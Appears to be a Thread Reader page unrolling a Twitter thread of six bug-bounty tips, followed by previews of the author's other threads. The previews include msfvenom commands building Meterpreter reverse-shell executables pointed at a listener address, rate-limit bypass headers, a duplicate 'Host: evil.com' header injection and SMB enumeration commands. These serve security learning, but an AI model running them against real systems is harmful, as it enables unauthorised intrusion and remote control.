Abhishek Meena Profile picture
Nov 4 10 tweets 4 min read
6 Bugbounty Tips from @EdOverflow
#infosec #bugbountytip

Thread 🧵(1/n) :👇 Bugbountytips
Tip #1 #bugbounty #infosec

Use GIT as a recon tool. Find the target's GIT repositories, clone them, and then check the logs for information on the team not necessarily in the source code. Say the target is Reddit and I want to see which developers work on certain projects.
Tip #2
Look for GitLab instances on targets or belonging to the target. When you stumble across the GitLab login panel, navigate to /explore. Misconfigured instances do not require authentication to view the internal projects.
Once you get in, use the search function to find passwords, keys, etc. This is a pretty big attack vector and I am finally revealing it today, because I am sure it will help a lot of you get some critical issues.
Tip #3

Bug bounty tip: test applications of a company that costs money or requires manual setup. Chances are only few to none would have tested it leaving it vulnerable.
Tip #4

If you’ve found an IDOR where you’re able to change data of others then don’t jump out of your seat to report it > modify it to XSS payload & if inputs are not sanitized & variables are echo’d without getting escaped then IDOR>XSS>ATO.
Tip #5
Look for hackathon-related assets. What I mean by this is sometimes companies run hackathons and give attendees special access to certain API endpoints and/or temporary credentials.
I have found GIT instances that were set up for Hackathons full of information that allowed me to find more issues in the target several times.
Tip #6

Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports// | grep INSTALL.mysql.txt | grep 200 | less)/
Hope you Like 👌this thread (🧵) on
6 Bugbounty Tips from @EdOverflow

here is ( Cheatsheet of it👇)

You can follow me for more like this

Join My Bugbountytips Group :😎
t.me/bugbountyresou…

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Abhishek Meena

Abhishek Meena Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @Aacle_

Nov 5
20 Most used tools in web-application hacking
#bugbounty #Infosec #hacking

1. Burp Suite - Framework.
2. ZAP Proxy - Framework.
3. Dirsearch - HTTP bruteforcing.
4. Nmap - Port scanning.
5. Sublist3r - Subdomain discovery.

More 🧵( 1/n ) :👇
6. Amass - Subdomain discovery.
7. SQLmap - SQLi exploitation.
8. Metasploit - Framework.
9. WPscan - WordPress exploitation.
10. Nikto - Webserver scanning.
11. HTTPX - HTTP probing.
12. Nuclei - YAML based template scanning.
13. FFUF - HTTP probing.

#bugbounty #infosec
14. Subfinder - Subdomain discovery.
15. Masscan - Mass IP and port scanner.
16. Lazy Recon - Subdomain discovery.
17. XSS Hunter - Blind XSS discovery.
17. LinkFinder - Endpoint discovery through JS files.
20. JS-Scan - Endpoint discovery through JS files.

#bugbounty #infosec
Read 4 tweets
Nov 3
Web Cache Poisoning🌱🌵🔥
#bugbounty #infosec

The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.

Where to find 🧵(1/n) :👇 Web Cache Poisoning
🏹Basic Poisoning #bugbounty #infosec Web Cache Poisoning
🏹Seizing The cache #bugbounty #InfoSecJobs Web Cache Poisoning
Read 8 tweets
Nov 3
Bypass 429 🏹(Too Many Requests)

#bugbounty #infosec
Look🧵(1/n) :👇 Bypass 429
➡Try add some custom header #bugbounty #infosec

▪X-Forwarded-For : 127.0.0.1
▪X-Forwarded-Host : 127.0.0.1
▪X-Client-IP : 127.0.0.1
▪X-Remote-IP : 127.0.0.1
▪X-Remote-Addr : 127.0.0.1
▪X-Host : 127.0.0.1
➡Adding Null Byte ( %00 ) or CRLF ( %09, %0d, %0a ) at the end of the Email can bypass rate limit.
. . . #bugbounty #infosec #bypass

POST /ForgotPass.php HTTP/1.1
Host: target.com

email=victim@gmail.com%00
Read 7 tweets
Nov 2
🌱🔥🌵 SMB Enumeration 🌵🔥🌱
#SMB #bugbounty #infosec

Check out 🧵(1/n) :👇
🏹SMB OS Discovery #bugbounty
▪nmap $ip --script smb-os-discovery.nse

🏹Nmap port scan #infosec
▪nmap -v -p 139,445 -oG smb.txt $ip-254

🏹Netbios Information Scanning #SMB
▪nbtscan -r $ip/24

🏹Nmap find exposed Netbios servers
▪nmap -sU --script nbstat.nse -p 137 $ip
🏹SMB Enumeration Tools
#SMB #bugbounty #infosec

▪nmblookup -A $ip
▪smbclient //MOUNT/share -I $ip -N
▪rpcclient -U "" $ip
▪enum4linux $ip
▪enum4linux -a $ip
Read 9 tweets
Nov 2
Header Injection 🌵🌱 #bugbounty
#infosec #bugbountytips

🧵(1/n) :👇🏻 Header Injection
🏹 Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console

Client-IP:
Connection:
Contact:
Forwarded:
From:
Host:
Origin:
Referer:
True-Client-IP:
X-Client-IP:
X-Custom-IP-Authorization:
X-Forward-For:
X-Forwarded-For:
X-Forwarded-Host:
X-Forwarded-Server:
X-Host:
X-Original-URL:
X-Originating-IP:
X-Real-IP:
X-Remote-Addr:
X-Remote-IP:
X-Rewrite-URL:
X-Wap-Profile:

🏹Try to repeat same Host header 2 times
Host: legit.com
Stuff: stuff
Host: evil.com

#bugbounty #infosec
Read 12 tweets
Nov 1
Reverse-shells🔥🌵 #bugbounty #infosec

This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet: #bugbountytips

See🧵(1/n) :👇🏻
🏹For Windows : #bugbounty #infosec

➡Meterpreter #Reverse_shells

▪msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe

▪use exploit/multi/handler &
set payload windows/meterpreter/reverse_tcp
➡Meterpreter HTTPS #bugbounty #infosec

It is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.

▪msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
Read 16 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(